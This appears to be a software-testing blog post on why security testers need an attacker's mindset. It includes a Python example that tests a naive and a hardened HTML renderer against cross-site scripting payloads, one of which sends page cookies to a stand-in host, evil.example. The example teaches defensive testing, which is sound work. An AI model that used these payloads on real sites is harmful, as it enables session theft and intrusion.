Last week I launched a mini-series called Why the Testing Experts are Right. Each installment takes an excerpt from a past Testing the Limits interview and backs it up with real-life examples to show that these testing experts aren’t all talk.
Last week’s installment featured a quote from Michael Bolton on “corner cases” and discussed why “it’s a fringe use case” isn’t a good reason for missing a bug. This week we’ll look at a quote from cyber security expert Richard Stiennon and discuss the special skills of a great security tester.
“Security testing of software throughout its development cycle is indeed different from quality and functionality testing. Instead of testing against end user use cases you have to have the mindset of an attacker, a completely different use case. In addition to meticulous use of security testing tools (HP-Fortify, Veracode, etc.) a security tester must understand the application and how an attacker would leverage built-in functionality to subvert a system. A security tester must be diligent and detail oriented as well as imaginative and wily – a rare combination.” – Richard Stiennon
The first thing that comes to mind is the recent hacking of the New York Times. Though it’s not certain how their network was hacked, it’s speculated that an NYT staffer fell for a phishing scam. Here’s Kim Zetter, a senior reporter at Wired who covers cybercrime, speaking on NPR:
The New York Times story didn’t indicate exactly how the hackers got in, in its case, although they said that it might have been done through a phishing attack. And that’s often how a lot of attacks occur. A phishing attack is basically sending an email to employees, to workers, and tricking them into either clicking on a malicious link, going to a website that has malware on it that’ll download to their system, or clicking on an attachment that installs malware on that computer. And that’s basically the initial doorway that they get into. And then, from there, they route their way through the network to establish a more firm hold and install more tools.
You will never stop every employee from clicking a malicious link, so a single perimeter control is not enough. A system needs layered defenses that limit what one compromised workstation can reach, and monitoring that detects the intrusion while the attackers are still “routing their way through the network,” before they have a firm hold.
Even places that are supposed to be particularly secure still struggle with cyber security. The Federal Reserve confirmed that they were hacked earlier this month when attackers “exploited a temporary vulnerability in a website vendor product.”
There are lists and lists of companies and systems that have been hacked. Some had information stolen; some had their networks effectively shut down. White hat hackers continuously find vulnerabilities that large companies don’t know about, or gain access to sensitive networks that need to be better protected. What many of these breaches have in common is that the attackers found a way in that nobody had protected, because nobody had thought to test it. Software security testing is a highly specialized field. It’s different from finding a functional bug or evaluating usability: a functional test asks whether the application does what a legitimate user expects, while a security test asks what the application can be made to do by someone who is deliberately feeding it input it was never designed for. Security testers must know the common vulnerabilities, stay up to date whenever new tactics are developed and have the mindset of a hacker to stay one step ahead. Enter the rise of “white hat hacker” as a profession.
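To make the difference between the two mindsets concrete, here is an added example (not code from the original post or from any company mentioned in it) using a hypothetical comment-rendering function. The functional tester’s cases are things a real user would type; the security tester’s cases are things an attacker would type. Both versions of the renderer pass the functional cases, and only the attacker cases expose that the naive version lets user input become HTML. The renderer, the test inputs and the tag-counting oracle are all constructed for this illustration.

```python
import html
import re


def render_comment_naive(author: str, body: str) -> str:
    """Hypothetical happy-path implementation: user strings are dropped
    straight into the HTML template, so any markup in them is rendered."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_hardened(author: str, body: str) -> str:
    """Same template, but every untrusted value is HTML-escaped first so the
    browser treats it as text rather than parsing it as markup."""
    return (f'<div class="comment"><b>{html.escape(author)}</b>: '
            f'{html.escape(body)}</div>')


# Functional use cases (constructed): what a legitimate user types.
FUNCTIONAL_CASES = [
    ("alice", "Great post!"),
    ("bob", "Thanks for tip #2"),
]

# Attacker use cases (constructed): classic cross-site scripting payloads,
# the kind of "built-in functionality" (HTML rendering) an attacker leverages.
ATTACKER_CASES = [
    ("mallory", '<script>document.location="http://evil.example/?c="'
                '+document.cookie</script>'),
    ('"><img src=x onerror=alert(1)>', "hi"),
    ("mallory", '</div><a href="javascript:alert(1)">click</a>'),
]

# Oracle for the security test: count tag openings in the output. The template
# itself contributes a fixed number (4: <div, <b, </b, </div); anything beyond
# that means untrusted input was parsed as HTML instead of shown as text.
TAG_RE = re.compile(r"<[A-Za-z/]")
EXPECTED_TAGS = len(TAG_RE.findall(render_comment_naive("", "")))


def passes_functional_tests(render) -> bool:
    """The functional tester's check: does the user's text show up?"""
    return all(author in render(author, body) and body in render(author, body)
               for author, body in FUNCTIONAL_CASES)


def injected_markup(render, author: str, body: str) -> bool:
    """The security tester's check: did the input add tags to the page?"""
    return len(TAG_RE.findall(render(author, body))) > EXPECTED_TAGS


def find_injections(render) -> list:
    """Return the attacker cases that turn into live markup in this renderer."""
    return [(author, body) for author, body in ATTACKER_CASES
            if injected_markup(render, author, body)]


if __name__ == "__main__":
    for name, render in (("naive", render_comment_naive),
                         ("hardened", render_comment_hardened)):
        print(f"{name}: functional tests pass = {passes_functional_tests(render)}, "
              f"attacker cases that inject markup = {len(find_injections(render))}")
```

Nothing about the naive renderer is wrong from the end user’s point of view, and a functional suite built from the first list will stay green forever. The bug only appears when the test inputs are chosen by someone asking “what would I send if I wanted to subvert this?”, which is exactly the mindset Stiennon describes. The tag-counting oracle is deliberately simple; real security testing would also cover attribute and URL contexts, which a generic HTML escape does not fully address.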
Organizations (not just experts) are increasingly recognizing the need for this special skill set and have turned to white hat hackers – and sometimes hackers who don’t consider themselves white hats – to fill the void. Private corporations are turning to people highly attuned to software security to try to break their systems before someone else does.
“From [Chris Miller's] home in Wildwood, his day job is top secret security for Twitter. And for the past several years his hobby has been to hack everything from iPhones to car computers – finding flaws in security for major corporations.” – KSDK
“[15-year-old Cim] Stordal has made the Google Security Hall of Fame, been credited with disclosing a cross-site scripting bug to Apple, been thanked by Microsoft for disclosing a vulnerability to the company, and received an elite White Hat Visa card from Facebook with $500 credit on it.” – CNet
Governments are even starting to catch on to the idea that people who know security are the best people to employ for security testing. From KSDK:
In the past two years the National Security Agency added close to 3,000 cyber experts to its staff with a direct appeal to hackers on its website which reads, “If you have a few, shall we say, indiscretions in your past, don’t be alarmed.” …
“To me it makes sense… to get these kind of people on our side,” says Miller. “If you want to have an attack capability then you have to hire the kind of people who know how to do that. So, it’s not a surprise they’re doing that now.”
Not all security testing experts are hackers, but the point of these examples is that security experts are fighting hackers, so they need similar skills and expertise. Hackers spend time and energy looking for ways to break into (or just plain break) networks, websites, applications and software. You need a security tester who is just as dedicated, just as creative and maybe just a little bit devious to keep up.